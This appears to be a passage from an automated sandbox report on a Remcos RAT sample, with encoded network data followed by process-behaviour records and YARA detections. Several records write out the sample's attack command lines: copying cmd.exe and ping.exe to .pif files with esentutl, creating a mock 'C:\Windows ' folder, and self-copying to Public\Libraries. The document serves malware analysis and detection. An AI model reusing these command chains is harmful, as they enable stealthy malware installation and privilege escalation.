                                                                          2024-11-26 07:24:06 UTC1323INData Raw: 64 6c 6c 4a 53 69 36 43 54 49 34 34 6d 56 38 6c 43 68 59 4b 55 4c 79 6a 31 66 72 6a 4c 30 6e 33 6c 58 47 51 52 71 64 52 6f 33 36 7a 68 63 5a 4f 48 72 73 78 31 33 37 6e 5a 53 55 69 2b 6f 57 66 77 55 56 63 72 52 4e 61 7a 30 33 78 46 6c 55 6f 5a 38 79 74 57 73 71 66 6b 6c 32 67 6e 52 64 6f 49 6e 33 74 65 36 79 51 66 53 72 7a 75 4f 6f 66 6c 71 43 2b 57 6f 6d 4b 51 79 65 6b 53 4d 4f 6b 76 59 63 33 72 6d 6f 48 6a 52 52 74 43 6f 70 68 6b 35 63 6e 57 52 6d 58 39 57 33 48 62 5a 36 73 49 72 64 34 32 33 73 54 78 6e 63 6e 42 5a 4c 61 4b 50 52 68 62 4f 35 6b 68 44 47 73 67 5a 30 31 47 67 77 78 61 32 46 79 55 32 4f 37 6d 64 51 73 44 4e 70 6d 79 58 59 78 53 67 7a 6c 6a 69 5a 46 54 4c 34 58 52 63 79 51 73 79 31 62 75 49 4e 34 48 36 48 71 46 50 68 4c 36 32 61 2b 42 55 4c
                                                                          Data Ascii: dllJSi6CTI44mV8lChYKULyj1frjL0n3lXGQRqdRo36zhcZOHrsx137nZSUi+oWfwUVcrRNaz03xFlUoZ8ytWsqfkl2gnRdoIn3te6yQfSrzuOoflqC+WomKQyekSMOkvYc3rmoHjRRtCophk5cnWRmX9W3HbZ6sIrd423sTxncnBZLaKPRhbO5khDGsgZ01Ggwxa2FyU2O7mdQsDNpmyXYxSgzljiZFTL4XRcyQsy1buIN4H6HqFPhL62a+BUL
                                                                          2024-11-26 07:24:06 UTC1390INData Raw: 47 47 4e 64 67 54 2f 7a 51 52 6f 43 6d 74 6a 39 6c 75 4c 78 49 73 63 2b 5a 56 68 71 4e 42 41 35 74 6b 36 76 59 46 45 6d 6c 6d 42 53 4f 6f 5a 63 76 73 35 45 31 46 43 73 30 46 41 2b 4b 37 43 6d 74 61 49 36 48 37 62 6f 57 67 4c 55 42 32 78 59 6d 68 36 65 32 41 56 46 57 47 62 55 78 64 67 79 6e 49 30 74 68 68 75 65 78 32 35 37 4a 47 76 72 71 47 71 34 56 34 4e 76 65 6b 70 30 30 6f 57 51 56 30 52 36 35 44 4a 58 4c 38 49 57 59 42 54 69 49 50 6f 78 4a 71 6f 36 66 36 44 77 5a 4e 47 71 37 30 63 56 6c 7a 42 35 38 39 64 78 62 35 56 53 45 4f 75 66 6a 73 61 6a 65 73 59 46 79 4f 4d 50 33 31 53 76 70 4f 73 68 61 37 62 38 53 6a 66 55 65 74 48 64 62 79 53 43 33 74 6e 44 38 51 79 36 4b 54 36 6e 66 5a 48 50 69 4c 50 57 30 79 53 56 78 67 73 47 65 52 36 4f 6f 4b 4e 76 50 55 4b
                                                                          Data Ascii: GGNdgT/zQRoCmtj9luLxIsc+ZVhqNBA5tk6vYFEmlmBSOoZcvs5E1FCs0FA+K7CmtaI6H7boWgLUB2xYmh6e2AVFWGbUxdgynI0thhuex257JGvrqGq4V4Nvekp00oWQV0R65DJXL8IWYBTiIPoxJqo6f6DwZNGq70cVlzB589dxb5VSEOufjsajesYFyOMP31SvpOsha7b8SjfUetHdbySC3tnD8Qy6KT6nfZHPiLPW0ySVxgsGeR6OoKNvPUK
                                                                          2024-11-26 07:24:06 UTC1390INData Raw: 4c 43 6f 45 78 39 37 54 38 2b 33 4b 76 69 59 61 67 73 6f 4c 62 6b 4f 50 6d 6a 2f 71 55 53 4b 59 54 39 78 30 55 70 75 33 59 67 41 51 79 47 7a 45 51 59 4d 32 2b 69 63 74 6f 63 6c 6c 33 6a 30 32 50 6a 36 35 6d 54 62 4a 72 44 67 31 69 4c 43 65 42 6a 58 63 48 46 5a 35 55 4e 4f 63 32 75 6a 79 68 37 64 4a 77 59 78 71 63 75 77 35 49 41 39 45 66 65 64 6e 7a 57 71 38 44 66 4b 67 74 70 43 65 50 35 6e 31 50 41 6d 4b 4d 4e 76 45 66 35 6b 6b 70 62 46 70 36 43 47 38 67 54 4b 41 6f 34 6b 34 53 47 5a 70 70 37 36 62 64 52 6f 45 67 56 65 76 77 56 74 4f 37 69 50 67 52 4d 56 64 35 36 76 57 30 44 44 46 45 77 52 71 63 39 44 6b 46 52 61 37 63 6c 66 70 70 64 44 61 48 45 61 2f 4c 59 4f 6f 69 6e 51 78 78 73 6f 57 45 41 41 35 74 61 6b 59 69 74 61 50 32 4e 41 68 70 31 58 73 5a 67 36
                                                                          Data Ascii: LCoEx97T8+3KviYagsoLbkOPmj/qUSKYT9x0Upu3YgAQyGzEQYM2+ictocll3j02Pj65mTbJrDg1iLCeBjXcHFZ5UNOc2ujyh7dJwYxqcuw5IA9EfednzWq8DfKgtpCeP5n1PAmKMNvEf5kkpbFp6CG8gTKAo4k4SGZpp76bdRoEgVevwVtO7iPgRMVd56vW0DDFEwRqc9DkFRa7clfppdDaHEa/LYOoinQxxsoWEAA5takYitaP2NAhp1XsZg6
                                                                          2024-11-26 07:24:06 UTC1390INData Raw: 6b 46 31 4e 68 63 30 6a 52 50 30 32 35 34 4c 30 74 44 69 4d 43 67 49 71 49 72 4b 57 43 63 78 58 64 45 7a 39 6b 44 7a 66 39 79 4d 4d 34 7a 2f 6d 68 52 47 78 70 41 6b 53 41 49 77 54 70 62 37 6a 47 4c 44 64 79 5a 45 79 2f 70 4f 59 63 56 6f 74 4d 69 54 59 42 42 50 67 74 45 42 4a 42 4d 69 4f 2b 76 6c 43 6f 6a 46 5a 4f 48 6b 75 36 41 4e 6f 7a 4b 67 71 6d 6c 6f 48 4e 42 48 4e 36 43 50 34 63 2b 63 6a 55 6c 39 55 66 56 68 6e 74 68 35 6a 50 50 56 4b 73 37 52 78 37 4c 74 6a 63 33 72 72 78 32 50 71 6d 76 61 50 42 63 76 38 39 6a 43 2b 6e 33 71 6a 35 4e 78 71 69 57 65 6d 51 68 51 69 2b 68 4d 46 74 76 74 54 70 79 5a 46 4a 35 76 41 37 5a 68 6c 32 6c 53 39 38 69 38 4a 4c 72 6e 2b 74 6d 30 64 45 6b 78 48 43 61 31 6d 36 6c 75 30 4a 2f 72 41 54 4b 78 76 49 61 4e 66 68 49 35
                                                                          Data Ascii: kF1Nhc0jRP0254L0tDiMCgIqIrKWCcxXdEz9kDzf9yMM4z/mhRGxpAkSAIwTpb7jGLDdyZEy/pOYcVotMiTYBBPgtEBJBMiO+vlCojFZOHku6ANozKgqmloHNBHN6CP4c+cjUl9UfVhnth5jPPVKs7Rx7Ltjc3rrx2PqmvaPBcv89jC+n3qj5NxqiWemQhQi+hMFtvtTpyZFJ5vA7Zhl2lS98i8JLrn+tm0dEkxHCa1m6lu0J/rATKxvIaNfhI5
                                                                          2024-11-26 07:24:06 UTC1390INData Raw: 34 78 4c 2f 41 67 53 41 4c 4c 78 58 78 58 4a 79 54 63 6f 4b 67 36 55 38 68 6b 30 48 56 47 50 35 54 73 66 6c 77 44 30 79 54 51 4b 65 65 6c 75 39 47 32 6e 39 4d 68 54 54 6d 76 4c 47 2f 31 53 76 53 2f 70 58 52 4b 72 76 7a 67 36 4d 49 2b 6f 41 6f 35 50 66 39 55 36 4d 75 39 31 7a 70 47 6a 37 47 31 57 39 75 61 53 47 6f 44 39 66 45 6d 6e 79 53 6e 6d 41 76 66 4d 7a 54 74 30 49 56 6b 74 34 73 37 47 6a 34 39 6a 41 2f 65 38 52 78 55 76 4d 75 73 74 6a 42 73 62 4f 36 62 30 4c 39 65 53 32 5a 34 42 50 39 78 59 76 71 6d 76 58 2f 53 5a 4f 2b 65 67 37 43 71 72 71 43 68 6b 53 38 6d 69 53 55 47 54 63 72 4f 55 4c 4e 76 4e 7a 6a 32 31 50 31 6e 4a 49 6d 4e 6b 6b 6b 73 75 58 62 34 5a 79 73 69 7a 32 4e 76 53 58 48 39 47 4a 55 57 43 52 66 6c 61 66 69 68 2b 39 6c 62 57 4f 72 63 72
                                                                          Data Ascii: 4xL/AgSALLxXxXJyTcoKg6U8hk0HVGP5TsflwD0yTQKeelu9G2n9MhTTmvLG/1SvS/pXRKrvzg6MI+oAo5Pf9U6Mu91zpGj7G1W9uaSGoD9fEmnySnmAvfMzTt0IVkt4s7Gj49jA/e8RxUvMustjBsbO6b0L9eS2Z4BP9xYvqmvX/SZO+eg7CqrqChkS8miSUGTcrOULNvNzj21P1nJImNkkksuXb4Zysiz2NvSXH9GJUWCRflafih+9lbWOrcr
                                                                          2024-11-26 07:24:06 UTC1390INData Raw: 57 42 4d 4d 4b 36 7a 72 50 67 58 43 39 6f 54 33 44 65 4b 74 77 45 67 57 39 67 69 59 43 4d 68 45 43 53 69 43 43 4d 38 44 79 6b 6c 55 2f 35 69 31 38 72 50 5a 4e 6a 46 70 48 39 34 44 56 52 4c 67 67 6f 48 53 6e 48 59 35 64 6f 5a 42 47 65 36 4f 6f 72 31 52 2b 74 50 77 74 7a 44 56 6f 42 4b 33 6b 2b 74 63 51 4e 4d 6f 46 53 77 48 31 61 50 2f 64 57 64 64 37 79 2f 2b 43 77 68 63 36 71 68 62 35 30 32 32 6b 6e 68 77 36 64 2b 4f 49 51 53 70 34 77 78 33 68 77 50 4c 51 57 75 6c 6f 67 2f 6a 69 59 68 77 6d 5a 52 77 75 50 45 51 44 66 6a 37 41 44 4e 78 43 6e 78 6c 65 49 56 6c 33 75 4b 50 4a 4a 49 33 65 33 37 4d 68 62 45 6b 54 50 35 49 47 57 6c 63 41 58 58 78 79 30 43 31 55 56 74 73 4a 61 64 72 38 36 2b 69 6f 2b 56 4a 71 4e 50 72 33 57 49 70 71 6b 4a 56 62 4e 52 6b 77 38 52
                                                                          Data Ascii: WBMMK6zrPgXC9oT3DeKtwEgW9giYCMhECSiCCM8DyklU/5i18rPZNjFpH94DVRLggoHSnHY5doZBGe6Oor1R+tPwtzDVoBK3k+tcQNMoFSwH1aP/dWdd7y/+Cwhc6qhb5022knhw6d+OIQSp4wx3hwPLQWulog/jiYhwmZRwuPEQDfj7ADNxCnxleIVl3uKPJJI3e37MhbEkTP5IGWlcAXXxy0C1UVtsJadr86+io+VJqNPr3WIpqkJVbNRkw8R
                                                                          2024-11-26 07:24:06 UTC1390INData Raw: 58 6d 56 57 74 6d 72 50 58 75 38 36 68 62 56 39 6a 6e 66 41 76 72 44 2b 57 6d 2b 30 79 58 34 6c 6f 69 61 69 64 6d 44 67 65 66 67 4d 62 76 64 2f 59 71 71 73 55 34 42 2b 59 2b 6c 49 44 51 6a 70 79 30 4c 46 72 46 30 31 36 78 6e 4a 43 2f 6c 50 30 30 68 6c 75 4f 41 41 50 52 39 47 69 49 54 5a 6b 4e 4f 73 44 30 58 66 74 51 41 64 43 6e 4b 30 68 43 37 6f 31 42 6a 49 73 41 6a 6a 34 67 54 47 54 61 54 76 61 51 51 4f 72 4c 63 78 74 4e 53 61 38 31 48 4f 62 77 69 54 43 54 6b 49 56 55 34 79 79 69 6f 4f 69 56 70 4d 70 34 76 53 55 73 33 37 4e 37 7a 2b 70 35 6b 78 42 48 6b 38 37 44 36 73 55 65 67 59 31 37 72 5a 54 61 61 31 4e 61 4f 36 76 44 68 6d 39 74 2b 73 54 49 4c 6c 76 36 47 38 2f 6a 47 30 54 34 6f 73 2f 32 6f 70 34 35 6b 41 67 75 72 67 75 77 37 4c 30 4b 36 4b 6b 72 78
                                                                          Data Ascii: XmVWtmrPXu86hbV9jnfAvrD+Wm+0yX4loiaidmDgefgMbvd/YqqsU4B+Y+lIDQjpy0LFrF016xnJC/lP00hluOAAPR9GiITZkNOsD0XftQAdCnK0hC7o1BjIsAjj4gTGTaTvaQQOrLcxtNSa81HObwiTCTkIVU4yyioOiVpMp4vSUs37N7z+p5kxBHk87D6sUegY17rZTaa1NaO6vDhm9t+sTILlv6G8/jG0T4os/2op45kAgurguw7L0K6Kkrx
                                                                          2024-11-26 07:24:06 UTC1390INData Raw: 64 38 41 72 61 71 51 4b 49 6f 71 34 35 6a 35 76 74 72 44 6f 51 45 6b 57 4b 5a 79 73 53 41 4b 4a 33 56 51 39 2f 68 44 39 57 58 38 64 5a 4a 74 4d 7a 79 32 73 4b 62 5a 61 79 2f 62 67 57 75 71 55 58 5a 77 66 2f 32 55 44 32 36 79 71 69 4c 71 38 33 58 49 4b 34 68 44 49 52 37 46 35 4a 62 66 31 6c 53 35 4e 42 45 67 46 5a 6f 4a 31 32 70 72 79 4c 79 5a 61 4e 56 78 50 49 39 59 72 73 6e 39 74 52 5a 38 4c 75 59 39 38 38 68 66 36 74 62 67 48 2f 4e 65 6f 35 63 6d 47 50 33 55 47 46 39 4d 33 49 6c 74 6b 65 41 30 4c 70 31 57 41 31 58 6c 7a 43 32 34 55 72 54 42 36 70 2f 47 2b 37 49 45 53 6f 2f 65 7a 38 6f 41 30 59 74 46 69 64 39 79 31 51 6d 48 6d 6b 53 71 59 57 34 44 7a 6b 71 37 31 51 46 41 6a 54 39 58 2b 77 33 51 37 57 69 45 4a 45 4a 6f 43 4b 62 46 69 63 66 48 2f 4c 35 33
                                                                          Data Ascii: d8AraqQKIoq45j5vtrDoQEkWKZysSAKJ3VQ9/hD9WX8dZJtMzy2sKbZay/bgWuqUXZwf/2UD26yqiLq83XIK4hDIR7F5Jbf1lS5NBEgFZoJ12pryLyZaNVxPI9Yrsn9tRZ8LuY988hf6tbgH/Neo5cmGP3UGF9M3IltkeA0Lp1WA1XlzC24UrTB6p/G+7IESo/ez8oA0YtFid9y1QmHmkSqYW4Dzkq71QFAjT9X+w3Q7WiEJEJoCKbFicfH/L53


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:02:23:59
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\AWkpqJMxci.exe"
                                                                          Imagebase:0x400000
                                                                          File size:1'339'392 bytes
                                                                          MD5 hash:B4E2055B4877DCFCBF9A366106B15591
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:02:24:08
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" "
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:02:24:09
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:02:24:09
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\esentutl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                          Imagebase:0xdd0000
                                                                          File size:352'768 bytes
                                                                          MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:02:24:09
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\esentutl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                          Imagebase:0xdd0000
                                                                          File size:352'768 bytes
                                                                          MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\esentutl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\AWkpqJMxci.exe /d C:\\Users\\Public\\Libraries\\Bzaszylr.PIF /o
                                                                          Imagebase:0xdd0000
                                                                          File size:352'768 bytes
                                                                          MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\colorcpl.exe
                                                                          Imagebase:0x1b0000
                                                                          File size:86'528 bytes
                                                                          MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:9
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:02:24:11
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\xpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                          Imagebase:0xd10000
                                                                          File size:18'944 bytes
                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:02:24:20
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:02:24:20
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:02:24:20
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:16
                                                                          Start time:02:24:22
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\Libraries\Bzaszylr.PIF
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\Public\Libraries\Bzaszylr.PIF"
                                                                          Imagebase:0x400000
                                                                          File size:1'339'392 bytes
                                                                          MD5 hash:B4E2055B4877DCFCBF9A366106B15591
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:Borland Delphi
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 71%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:02:24:23
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\SndVol.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\SndVol.exe
                                                                          Imagebase:0x6d0000
                                                                          File size:226'712 bytes
                                                                          MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:20
                                                                          Start time:02:24:30
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\Libraries\Bzaszylr.PIF
                                                                          Wow64 process (32bit):true
